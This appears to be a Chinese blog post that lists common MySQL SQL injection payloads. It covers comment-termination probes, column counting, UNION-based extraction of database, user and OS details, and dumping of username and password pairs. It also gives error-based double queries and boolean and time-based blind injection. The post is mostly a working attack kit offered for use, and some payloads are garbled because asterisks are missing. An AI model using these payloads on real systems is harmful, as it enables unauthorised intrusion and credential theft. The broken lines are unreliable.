MySQL常用SQL注入语句

常规注入

‘ –+
‘ –%20
‘ #
‘ %23
‘ and 1=1 –+
‘ and 1=2 –+
‘ and 1=2 union select * from admin –+
‘ and 1=2 union select * from user –+
‘ and 1=2 union select * from users –+

爆字段长度

‘ order by 1 –+
‘ order by 2 –+
‘ order by 3 –+
‘ order by 4 –+
‘ order by 5 –+
‘ order by 6 –+
‘ order by 7 –+
‘ order by 8 –+
‘ order by 9 –+
‘ order by 10 –+

爆数据库信息,这仅限于字段长度为1

‘ and 1=2 union all select version() –+
‘ and 1=2 union all select user() –+
‘ and 1=2 union all select database() –+

判断操作系统

‘ and 1=2 union all select @@global.version_compile_os from mysql.user –+

数据库权限,返回正常说明root权限;

‘ and ord(mid(user(),1,1))=114 –+

爆数据

‘ and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 –+
‘ and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1–+
‘ and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1–+
‘ and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1–+
‘ and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name –+
‘ and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name –+

不使用注释符

‘ and ‘1
‘ union select 1 and ‘1
‘ union select 1,2 and ‘1
‘ and 1=2 union select 1,version(),3 and ‘1
‘ or ‘1

带括号防注入

‘) –+
‘) –%20
‘) #
‘) %23

双引号防注入

” –+
” –%20
” #
” %23

双引号+括号

“) –+
“) –%20
“) #
“) %23

双查询输入

统计有多少字段

select count(*) from table_name;

随机数生成

select rand();
select rand()*4;

浮点数

select floor(rand());
select floor(rand()*4);

别名

select floor(rand()*4) as query;

分组

select username,password from user group by username;

两次查询

select(select database());

连接字符串concat(str1,str2)

select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()2)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()
2)) as query from user;
select count(),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()2)) as query from user group by query;
select count(),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()2)) as query from user group by query;
select count(),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()2)) as query from user group by query;

‘ and (select 1 from (select count(),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()2)) as query from user group by query) as test) –+
‘ and 1=2 union (select * from (select count(),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()2)) as query from user group by query) as test) –+

盲注

bool型盲注

select database();

判断长度

select length(database());

截取字符串substr(str,num1,num2) num1:从第几个开始取;num2:取多少个

select substr(database(),1,1);

ascii码

select ascii(substr(database(),1,1));

‘ and 1<2 –+
‘ and (ascii(substr((select database()),1,1)))=98–+

时间型盲注

睡眠

select sleep(1);

进行判断

select if((select database())=”bloodzero”,sleep(10),null);

‘ and sleep(10) –+
‘ and if((select database())=”bloodzero”,sleep(10),null)–+

发表评论

电子邮件地址不会被公开。 必填项已用*标注